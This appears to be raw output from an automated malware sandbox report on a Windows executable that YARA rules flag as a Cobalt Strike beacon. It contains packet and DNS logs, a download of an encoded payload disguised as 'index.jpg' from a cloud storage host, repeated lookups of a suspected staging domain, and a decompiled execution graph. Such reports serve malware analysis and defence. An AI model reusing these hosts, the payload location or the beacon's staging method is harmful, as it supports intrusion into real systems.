                                                                Oct 17, 2024 09:20:15.516666889 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.516721964 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.518219948 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.518358946 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.518460989 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.521346092 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.558572054 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.558584929 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.558629036 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.559842110 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.560971022 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.598355055 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.598367929 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.598434925 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.599827051 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.600153923 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.600223064 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.603171110 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.604146004 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.604157925 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.604206085 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.607152939 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.607978106 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.615247011 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.615259886 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.615304947 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.616730928 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.616743088 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.616796017 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.619772911 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.623049021 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.623061895 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.623146057 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.624564886 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.628967047 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.648581982 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.648844004 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.650156021 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.650284052 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.650350094 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.653276920 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.691080093 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.691207886 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.691250086 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.691617966 CEST4973580192.168.2.443.152.64.207
                                                                Oct 17, 2024 09:20:15.737890005 CEST804973543.152.64.207192.168.2.4
                                                                Oct 17, 2024 09:20:15.737961054 CEST4973580192.168.2.443.152.64.207
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 17, 2024 09:20:09.095582962 CEST4982853192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:20:09.468378067 CEST53498281.1.1.1192.168.2.4
                                                                Oct 17, 2024 09:20:16.122220039 CEST6179953192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:20:16.173314095 CEST53617991.1.1.1192.168.2.4
                                                                Oct 17, 2024 09:20:40.230952978 CEST5349762162.159.36.2192.168.2.4
                                                                Oct 17, 2024 09:20:40.855911016 CEST5216853192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:20:40.863260984 CEST53521681.1.1.1192.168.2.4
                                                                Oct 17, 2024 09:20:45.225013018 CEST5936453192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:20:45.235436916 CEST53593641.1.1.1192.168.2.4
                                                                Oct 17, 2024 09:21:20.022018909 CEST6361053192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:21:20.030700922 CEST53636101.1.1.1192.168.2.4
                                                                Oct 17, 2024 09:22:00.634013891 CEST5597453192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:22:00.641715050 CEST53559741.1.1.1192.168.2.4
                                                                Oct 17, 2024 09:22:37.459774971 CEST6005053192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:22:37.467211008 CEST53600501.1.1.1192.168.2.4
                                                                Oct 17, 2024 09:23:08.835302114 CEST5093753192.168.2.41.1.1.1
                                                                Oct 17, 2024 09:23:08.845695972 CEST53509371.1.1.1192.168.2.4
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 17, 2024 09:20:09.095582962 CEST192.168.2.41.1.1.10x9858Standard query (0)intl-web-1305970982.cos.ap-singapore.myqcloud.comA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:20:16.122220039 CEST192.168.2.41.1.1.10xbe63Standard query (0)img.bilibili.buzzA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:20:40.855911016 CEST192.168.2.41.1.1.10x35e2Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                Oct 17, 2024 09:20:45.225013018 CEST192.168.2.41.1.1.10xd2d1Standard query (0)img.bilibili.buzzA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:21:20.022018909 CEST192.168.2.41.1.1.10xa291Standard query (0)img.bilibili.buzzA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:22:00.634013891 CEST192.168.2.41.1.1.10x4f15Standard query (0)img.bilibili.buzzA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:22:37.459774971 CEST192.168.2.41.1.1.10x507Standard query (0)img.bilibili.buzzA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:23:08.835302114 CEST192.168.2.41.1.1.10x85acStandard query (0)img.bilibili.buzzA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 17, 2024 09:20:09.468378067 CEST1.1.1.1192.168.2.40x9858No error (0)intl-web-1305970982.cos.ap-singapore.myqcloud.comsgp.file.myqcloud.comCNAME (Canonical name)IN (0x0001)false
                                                                Oct 17, 2024 09:20:09.468378067 CEST1.1.1.1192.168.2.40x9858No error (0)sgp.file.myqcloud.com43.152.64.207A (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:20:09.468378067 CEST1.1.1.1192.168.2.40x9858No error (0)sgp.file.myqcloud.com43.153.232.151A (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:20:09.468378067 CEST1.1.1.1192.168.2.40x9858No error (0)sgp.file.myqcloud.com43.153.232.152A (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:20:09.468378067 CEST1.1.1.1192.168.2.40x9858No error (0)sgp.file.myqcloud.com43.152.64.193A (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:20:16.173314095 CEST1.1.1.1192.168.2.40xbe63Name error (3)img.bilibili.buzznonenoneA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:20:40.863260984 CEST1.1.1.1192.168.2.40x35e2Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                Oct 17, 2024 09:20:45.235436916 CEST1.1.1.1192.168.2.40xd2d1Name error (3)img.bilibili.buzznonenoneA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:21:20.030700922 CEST1.1.1.1192.168.2.40xa291Name error (3)img.bilibili.buzznonenoneA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:22:00.641715050 CEST1.1.1.1192.168.2.40x4f15Name error (3)img.bilibili.buzznonenoneA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:22:37.467211008 CEST1.1.1.1192.168.2.40x507Name error (3)img.bilibili.buzznonenoneA (IP address)IN (0x0001)false
                                                                Oct 17, 2024 09:23:08.845695972 CEST1.1.1.1192.168.2.40x85acName error (3)img.bilibili.buzznonenoneA (IP address)IN (0x0001)false
                                                                • intl-web-1305970982.cos.ap-singapore.myqcloud.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.44973543.152.64.207807516C:\Users\user\Desktop\SO2mdwWVvg.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 17, 2024 09:20:12.554409981 CEST104OUTGET /Shorts/index.jpg HTTP/1.1
                                                                accept: */*
                                                                host: intl-web-1305970982.cos.ap-singapore.myqcloud.com
                                                                Oct 17, 2024 09:20:14.010185957 CEST1236INHTTP/1.1 200 OK
                                                                Content-Type: image/jpeg
                                                                Content-Length: 265737
                                                                Connection: keep-alive
                                                                Accept-Ranges: bytes
                                                                Content-Disposition: attachment
                                                                Date: Thu, 17 Oct 2024 07:20:13 GMT
                                                                ETag: "cb2adef84b6c2bc005f525170ecb07d1"
                                                                Last-Modified: Wed, 16 Oct 2024 01:57:06 GMT
                                                                Server: tencent-cos
                                                                x-cos-force-download: true
                                                                x-cos-hash-crc64ecma: 10551430607150370035
                                                                x-cos-request-id: NjcxMGJhYWRfODhlZjc4MGJfNjczZl9hYWYxYmNh
                                                                Data Raw: e3 f1 fe f7 f6 e3 f1 fe f7 2b 29 20 3c 32 2e fa 84 26 e6 8a 53 61 6e 67 2e fe 7c 84 98 99 8c 29 e7 b8 2e f2 a2 2a 03 67 73 9e bd 26 de 83 d4 cc 31 0e 77 61 6e 67 3c 3b e8 97 98 b6 73 61 6e 67 66 73 61 6e 67 96 73 61 6e 42 87 b1 ca 63 f2 13 76 c2 90 af 00 ab 43 01 9e b5 2b 35 52 d8 aa fa 82 92 f3 bb 22 89 13 43 0c ca 2d 0c 4b 8d 34 1e 7a 00 8f e7 d7 c9 66 11 2e c8 51 cb cf 83 de 77 46 f4 3b f8 90 f5 9e fd 58 18 95 c1 17 e1 49 bf 76 1a f8 36 ea 4f 34 35 88 9a b1 10 de 25 cf 2d 33 dd 74 89 42 ce e3 eb b7 0e 36 2f ae 9a 21 87 4a 70 b0 51 58 ef 4f 4e 4e c2 83 66 63 0d 1b 6f fe 69 95 07 7c 7b 7f 3f e5 04 71 83 93 7b f6 d5 9b 3a 4a 99 48 fa 11 e9 94 c4 c8 70 fd fc 31 c3 03 b6 e8 22 65 71 91 96 4e e4 33 f2 82 57 71 be e8 81 63 b8 d7 5c 86 40 9d 28 3c 61 6e 03 e0 76 61 52 5d fb 12 61 6e 67 66 b0 9e 91 98 96 73 42 5e 6c 64 78 61 6e df 64 73 61 6e 65 66 73 61 6e 67 a6 9e 68 6e 67 76 73 61 6e 67 66 f3 60 6e 67 66 73 71 6e 67 66 71 61 6e 62 66 71 61 6e 67 66 73 64 6e 65 66 73 61 6e 67 66 53 26 6e 67 62 73 61 6e [TRUNCATED]
                                                                Data Ascii: +) <2.&Sang.|).*gs&1wang<;sangfsangsanBcvC+5R"C-K4zf.QwF;XIv6O45%-3tB6/!JpQXONNfcoi|{?q{:JHp1"eqN3Wqc\@(<anvaR]angfsB^ldxandsanefsanghngvsangf`ngfsqngfqanbfqangfsdnefsangfS&ngbsangfscngsa~gfsangvsangfsanwfsangfcangfsangsqngfmg4sanpagfsangfsangfenFsangfsangfsjgfuangfsangfsangfsangfsangfsangfsangfmgsangfsangfsaef3gngfsangfsangfsangfsangfsanfsefsqngfcngbsangfsangfsangFsassgfslgfangqangfsangfsang&sa.fsgfsmgfUangpangfsangfsang&sasNgfsjgfQangpangfsangfsang&sa.sagfsjgfcangpangfsangfsang&sa,6|_6zf/NU6}x`A-1|AGI"MW5Pic}7:(IsP5
                                                                Oct 17, 2024 09:20:14.010201931 CEST1236INData Raw: 32 25 7d 82 4b a5 b3 15 fc 8a 31 ac a8 f5 bc 2f e2 52 eb db a9 c6 da f7 60 9e 71 3c 8a 7b b6 9a 8e a3 25 de 28 32 f7 9e 0d d2 3d c6 b7 03 10 ab b0 34 a1 99 15 a0 3a d5 79 00 ee 89 69 09 a5 5b 1f 7a a7 4b 18 9f 4b cb e5 38 42 f0 79 5a 1d 0b 0c a5
                                                                Data Ascii: 2%}K1/R`q<{%(2=4:yi[zKK8ByZWC7pK%K=CgvI!9~(jO'$4wD*\TAsVyO'*3'ZpFnKGiX\!8m*2*}v"%<lHfsan.t$+9,
                                                                Oct 17, 2024 09:20:14.010215044 CEST408INData Raw: a2 ad e5 2e 62 eb 26 6f e6 4f f6 93 84 20 70 d7 8a e7 2e f4 9c b9 2d 8a 39 e5 a9 21 65 ce b5 e5 29 ea b8 ea 86 53 2f f4 ac 55 5b 66 38 a3 e5 5b 64 8b fd a9 d8 55 83 62 e5 2f f9 94 e2 e5 2f c9 94 ea e5 2f d1 94 f2 e5 27 61 90 e3 f2 e5 fb ef 61 61
                                                                Data Ascii: .b&oO p.-9!e)S/U[f8[dUb///'aaah;f-$+93N.Y&;{/U)WL!e'E&=R']*wv;bZU;b(v5cFc )b&(v %-.g&i3c,ZbK)'[
                                                                Oct 17, 2024 09:20:14.011647940 CEST1236INData Raw: e4 e6 e3 fa ec 26 5c fa e5 2f a0 9c 7b ae a4 ed 83 66 e5 2d e1 94 e2 e5 2f 5c f1 29 a4 ed 2e 69 e3 26 54 ed 3b 48 45 98 8e b0 a2 28 64 aa 35 44 ad a4 a5 f1 29 e4 a0 28 f1 5d 2e 5c da bf 25 7c a4 a5 b0 91 7f e5 2e 70 55 5c e0 2e 70 27 7f ab 20 0f
                                                                Data Ascii: &\/{f-/\).i&T;HE(d5D)(].\%|.pU\.p' Sq! p)'/,,/p)b&q-[wY 5T)&8=;meO pp)/r)pwy) !m;\.Z,
                                                                Oct 17, 2024 09:20:14.011661053 CEST1236INData Raw: 94 e2 e5 2f c9 94 ea e5 2f d1 94 f2 e5 2f d9 94 fa e5 27 61 80 e3 f3 67 69 7c 6e e5 2d f9 94 aa e5 2d d1 94 b2 fa ec 26 5c 82 e5 2f 54 83 79 e5 29 98 39 c0 a9 a4 ed 3b ad e5 21 6c c4 ae e5 2f 73 58 1b 2a a6 a5 35 62 d9 ba 5a 73 ea 2e 63 f5 33 59
                                                                Data Ascii: ///'agi|n--&\/Ty)9;!l/sX*5bZs.c3YD3jR..&tg.sIAhi|$$'I&]k s/r/$qC~J'mOa._{;d'(^!mZseX!e[No)z(+eDjM1.s&
                                                                Oct 17, 2024 09:20:14.011674881 CEST1236INData Raw: 8a e5 2d e1 94 82 45 80 8a b0 a2 9e 52 2e 68 27 6d ab 20 9e 5c 52 5b ec 3b ac 9e 76 5a a5 4b 2c a0 a5 35 62 a2 21 86 b1 a2 ad ec 28 fd 2a 52 b1 22 31 a6 ad 2f 7d 35 62 a2 21 a2 4e 5d 52 ec 2e f7 92 e5 2d 11 94 5a ad a4 a5 f8 2b 19 80 55 b0 a2 ad
                                                                Data Ascii: -ER.h'm \R[;vZK,5b!(*R"1/}5b!N]R.-Z+U,E$ P;)/=-)z96t-!j),<m+9,4&,<+9,45&9.4$089&$/+99;-$$
                                                                Oct 17, 2024 09:20:14.011697054 CEST1236INData Raw: 65 e5 2e 73 63 62 b2 a6 fc 86 f9 a7 74 71 6a a0 e5 2e 7b 91 55 af 6e f4 a1 6f e5 86 7a e7 ae 6c e4 3b 61 ec 2f 73 f1 91 7a e5 86 61 63 65 a6 96 48 e3 9e 72 e4 3b 61 8e 67 ae 78 e3 26 65 a6 49 e3 26 6d e4 b3 5a e9 29 23 14 20 92 36 64 78 a9 26 53
                                                                Data Ascii: e.scbtqj.{Unozl;a/szaceHr;agx&eI&mZ)# 6dx&Sdyl;cljqjm;e|.{bemf@f`)jem].sjm)oT)g@cddxl;u)#es/g)[emvxs.vsll;mjqlrTi})|/cqjbTc)jc|m
                                                                Oct 17, 2024 09:20:14.011709929 CEST816INData Raw: af 6c 71 6a a0 e0 a6 72 e6 9e 74 e4 93 6c ec a7 55 f1 29 6c e5 2e 63 63 65 a6 96 67 e6 9e 74 86 66 e3 26 63 e4 93 63 ec 97 76 bb 6a 26 62 e1 b3 73 26 6a 64 78 a9 e8 a7 75 71 6b b4 97 6d 3b 64 6c 6c a3 83 6a ae e9 29 b3 73 e9 29 26 7c 03 a1 80 e4
                                                                Data Ascii: lqjrtlU)l.ccegtf&ccvj&bs&jdxuqkm;dllj)s)&|;`llo/r]s)wfcf;k|hsm/gqj})lre.vtem&jzlm/.Yl;d/~qjm;aen4ace;h}igdH)n/s{gcezr;`gx&c{/ju(7
                                                                Oct 17, 2024 09:20:14.013746023 CEST1236INData Raw: e4 3b 78 6c 6c a3 83 6a ec 2f 67 71 69 bb a7 e8 1c a1 7c 65 6d bd e3 26 6d 96 68 e3 a6 6e e1 b3 60 ec 87 6a f5 a1 5d e5 2e 72 29 7a 97 73 f1 81 7b 65 6d b2 91 75 97 72 f1 29 6c e5 86 72 a9 65 e5 2e 76 a1 74 e5 2e 7e e3 ae 7c e0 3d 21 5e af 45 76
                                                                Data Ascii: ;xllj/gqi|em&mhn`j].r)zs{emur)lre.vt.~|=!^Evce;ylmj/ccfdxl.sa&n{ce`}dH)nem|;`gx&c{ll)bhcdx&cdxl.f #!xr;Yrqm.s{em|])nr&r;illimZoza
                                                                Oct 17, 2024 09:20:14.014390945 CEST1236INData Raw: 72 e3 a6 6a 86 7f e7 ae 7c e4 3b 64 ec 2f 77 83 71 ec 87 76 71 6a af e0 96 48 e3 9e 76 2e 76 e3 8e 62 ae 78 e3 26 67 e1 b3 5b ec 2f 6e f5 a1 55 e1 28 31 e9 cb be 0d 71 6b b4 65 6d bb 91 65 e5 2e 73 63 65 a2 96 78 a1 e0 40 a6 61 e6 ae 66 e4 b3 5a
                                                                Data Ascii: rj|;d/wqvqjHv.vbx&g[/nU(1qkeme.scex@afZ/j)jem&j;qelkcl~zv)jeml;dbj&ckll;mmqk(2&gj&c;sllj/dcgJudx/j}yflU)l.czsqj`w;edj&bs&jr)&
                                                                Oct 17, 2024 09:20:14.073034048 CEST1236INData Raw: 81 6e af 6e f1 29 7b e5 86 7a e3 9e 73 ae 78 e3 8e 75 e4 3b 63 6c 6c ae f4 a1 4c e5 96 66 e7 ae 44 e4 3b 6b e9 29 23 ff 68 31 ff e0 3b 4e 6c 6d bc 83 6a ec 2f 64 f1 63 60 b2 64 78 a4 9e 6c e4 3b 66 ae e9 bd b3 73 ec 2f 6e f1 a9 61 65 6d bd e6 ae
                                                                Data Ascii: nn){zsxu;cllLfD;k)#h1;Nlmj/dc`dxl;fs/naemfJor/aqjX&gfl;`Lqj.zLdy/bjd)or&qdxl.lnQjm)hq&hdxtocfh&adxt;f`c&orcdb$;allj)"^ ";/f)|


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:03:20:07
                                                                Start date:17/10/2024
                                                                Path:C:\Users\user\Desktop\SO2mdwWVvg.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\SO2mdwWVvg.exe"
                                                                Imagebase:0x7ff63f4f0000
                                                                File size:8'063'016 bytes
                                                                MD5 hash:BFA844F0BE57643E3EBF11690E539A75
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.1770728678.000001DDE5E00000.00000010.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.3567175661.000001DDE60F0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3566662494.000001DDE5F05000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:low
                                                                Has exited:false

                                                                Target ID:1
                                                                Start time:03:20:07
                                                                Start date:17/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:2.6%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:6.1%
                                                                  Total number of Nodes:735
                                                                  Total number of Limit Nodes:49
                                                                  execution_graph 13954 1dde60ffc3e 13955 1dde60ffc5f SleepEx 13954->13955 13957 1dde60ffd1c 13955->13957 14684 1dde60fdc70 14685 1dde60fdca7 _recalloc 14684->14685 14686 1dde610316c _DllMainCRTStartup RtlFreeHeap 14685->14686 14687 1dde60fdce7 _DllMainCRTStartup 14686->14687 14687->14687 14690 1dde6104460 14687->14690 14689 1dde60fdd54 14691 1dde610448e _recalloc 14690->14691 14694 1dde61041cc 14691->14694 14693 1dde61044c8 14693->14689 14695 1dde61041fa 14694->14695 14696 1dde61041fe 14695->14696 14700 1dde610420b 14695->14700 14701 1dde60fecb4 14696->14701 14698 1dde60fecb4 2 API calls 14699 1dde6104206 14698->14699 14699->14693 14700->14698 14700->14699 14702 1dde60fed21 14701->14702 14703 1dde60fecc7 14701->14703 14704 1dde60fe9fc 2 API calls 14702->14704 14703->14702 14705 1dde60fecd8 14703->14705 14709 1dde60fecfc 14704->14709 14710 1dde60fe9fc 14705->14710 14707 1dde60fecec 14714 1dde60feb00 14707->14714 14709->14699 14711 1dde60fea17 _recalloc _DllMainCRTStartup 14710->14711 14713 1dde60fea89 14710->14713 14711->14713 14731 1dde60fcbd8 14711->14731 14713->14707 14715 1dde60feb42 14714->14715 14716 1dde60feb55 14715->14716 14717 1dde60feb46 14715->14717 14719 1dde60feb70 14716->14719 14721 1dde60fec01 14716->14721 14824 1dde60fcca4 14717->14824 14720 1dde60fcbd8 _DllMainCRTStartup 2 API calls 14719->14720 14729 1dde60feb4e 14720->14729 14722 1dde61097dc malloc RtlFreeHeap 14721->14722 14723 1dde60fec0d _recalloc _DllMainCRTStartup 14722->14723 14724 1dde60fec36 14723->14724 14728 1dde60fec5b 14723->14728 14725 1dde60fcca4 _DllMainCRTStartup 2 API calls 14724->14725 14726 1dde60fec3e _recalloc 14725->14726 14727 1dde610979c free RtlFreeHeap 14726->14727 14727->14729 14728->14729 14730 1dde60fcbd8 _DllMainCRTStartup 2 API calls 14728->14730 14729->14709 14730->14726 14732 1dde60fcbec _DllMainCRTStartup 14731->14732 14735 1dde60fbe4c 14732->14735 14734 1dde60fcc82 14734->14713 14736 1dde60fbe6d _DllMainCRTStartup 14735->14736 14737 1dde60fbe90 14736->14737 14738 1dde60fbe81 14736->14738 14749 1dde60fbeb0 14737->14749 14742 1dde60fca6c 14738->14742 14741 1dde60fbe8e 14741->14734 14743 1dde60fca8d _DllMainCRTStartup 14742->14743 14744 1dde60fcaa0 14743->14744 14745 1dde60fca99 14743->14745 14747 1dde60fbeb0 _DllMainCRTStartup 2 API calls 14744->14747 14756 1dde60fc980 14745->14756 14748 1dde60fca9e 14747->14748 14748->14741 14762 1dde60fcabc 14749->14762 14752 1dde60fbefc 14752->14741 14753 1dde60fbef4 14755 1dde610979c free RtlFreeHeap 14753->14755 14755->14752 14757 1dde60fc9ab _DllMainCRTStartup 14756->14757 14758 1dde60fbeb0 _DllMainCRTStartup 2 API calls 14757->14758 14759 1dde60fca18 14758->14759 14760 1dde60fca4f 14759->14760 14761 1dde60fbeb0 _DllMainCRTStartup 2 API calls 14759->14761 14760->14748 14761->14759 14763 1dde61097dc malloc RtlFreeHeap 14762->14763 14765 1dde60fcaea _DllMainCRTStartup 14763->14765 14764 1dde60fbecc 14764->14752 14764->14753 14770 1dde60fd43c 14764->14770 14765->14764 14766 1dde60fcb3e 14765->14766 14767 1dde60fcb37 14765->14767 14780 1dde6107ae4 14766->14780 14768 1dde610979c free RtlFreeHeap 14767->14768 14768->14764 14771 1dde60fd470 14770->14771 14773 1dde60fd499 14770->14773 14772 1dde61097dc malloc RtlFreeHeap 14771->14772 14775 1dde60fd478 14772->14775 14774 1dde60fd508 14773->14774 14778 1dde60fd4bd _setmbcp 14773->14778 14794 1dde60fd208 14773->14794 14774->14753 14776 1dde61091b4 _DllMainCRTStartup 2 API calls 14775->14776 14776->14773 14778->14774 14779 1dde60fd208 _DllMainCRTStartup RtlFreeHeap 14778->14779 14779->14774 14781 1dde6107b11 _DllMainCRTStartup 14780->14781 14782 1dde6107b89 14781->14782 14784 1dde60f098c 14781->14784 14782->14764 14786 1dde60f09b8 _DllMainCRTStartup 14784->14786 14785 1dde60f09d7 14785->14782 14786->14785 14787 1dde61097dc malloc RtlFreeHeap 14786->14787 14788 1dde60f0a07 14787->14788 14788->14785 14789 1dde60f3300 _DllMainCRTStartup RtlFreeHeap 14788->14789 14791 1dde60f0a24 _DllMainCRTStartup 14789->14791 14790 1dde610979c free RtlFreeHeap 14790->14785 14792 1dde60f3170 _DllMainCRTStartup RtlFreeHeap 14791->14792 14793 1dde60f0a52 14791->14793 14792->14793 14793->14790 14795 1dde60fd24e _recalloc 14794->14795 14810 1dde60fd3fe _DllMainCRTStartup 14795->14810 14811 1dde61050b8 14795->14811 14797 1dde60fd28f 14798 1dde6109b9c _snprintf RtlFreeHeap 14797->14798 14799 1dde60fd2aa 14798->14799 14800 1dde6109b9c _snprintf RtlFreeHeap 14799->14800 14801 1dde60fd2c6 _DllMainCRTStartup 14800->14801 14814 1dde6104820 14801->14814 14803 1dde60fd30e 14804 1dde60fd33e 14803->14804 14805 1dde60fd32c 14803->14805 14806 1dde6109b9c _snprintf RtlFreeHeap 14804->14806 14807 1dde6109b9c _snprintf RtlFreeHeap 14805->14807 14808 1dde60fd33c _DllMainCRTStartup 14806->14808 14807->14808 14808->14808 14808->14810 14820 1dde60fd524 14808->14820 14810->14778 14812 1dde610316c _DllMainCRTStartup RtlFreeHeap 14811->14812 14813 1dde61050e1 _DllMainCRTStartup 14812->14813 14813->14797 14815 1dde610486f _setmbcp _recalloc _DllMainCRTStartup 14814->14815 14816 1dde6104fdd 14815->14816 14817 1dde6109b9c RtlFreeHeap _snprintf 14815->14817 14818 1dde6104c11 _setmbcp _recalloc _DllMainCRTStartup 14815->14818 14816->14818 14819 1dde6109b9c _snprintf RtlFreeHeap 14816->14819 14817->14815 14818->14803 14819->14818 14821 1dde60fd54f 14820->14821 14822 1dde60fd55d 14821->14822 14823 1dde610a364 _DllMainCRTStartup RtlFreeHeap 14821->14823 14822->14808 14823->14822 14825 1dde60fcbec _DllMainCRTStartup 14824->14825 14826 1dde60fbe4c _DllMainCRTStartup 2 API calls 14825->14826 14827 1dde60fcc82 14826->14827 14827->14729 14669 1dde610bbcc 14670 1dde610bbf0 14669->14670 14671 1dde610bbe6 14669->14671 14673 1dde610bbf5 14670->14673 14678 1dde610bbfc _callnewh 14670->14678 14672 1dde61097dc malloc RtlFreeHeap 14671->14672 14682 1dde610bbee _dosmaperr 14672->14682 14676 1dde610979c free RtlFreeHeap 14673->14676 14674 1dde610bc02 RtlReAllocateHeap 14674->14678 14674->14682 14675 1dde610bc45 _callnewh 14680 1dde610bfd0 _errno RtlFreeHeap 14675->14680 14676->14682 14677 1dde610bc83 14679 1dde610bfd0 _errno RtlFreeHeap 14677->14679 14678->14674 14678->14675 14678->14677 14681 1dde610bc6a 14678->14681 14679->14682 14680->14682 14683 1dde610bfd0 _errno RtlFreeHeap 14681->14683 14683->14682 13958 1dde610be00 13959 1dde610be1c _DllMainCRTStartup 13958->13959 13964 1dde610beac 13959->13964 13968 1dde610be76 13959->13968 13970 1dde610bca0 13959->13970 13961 1dde610beca 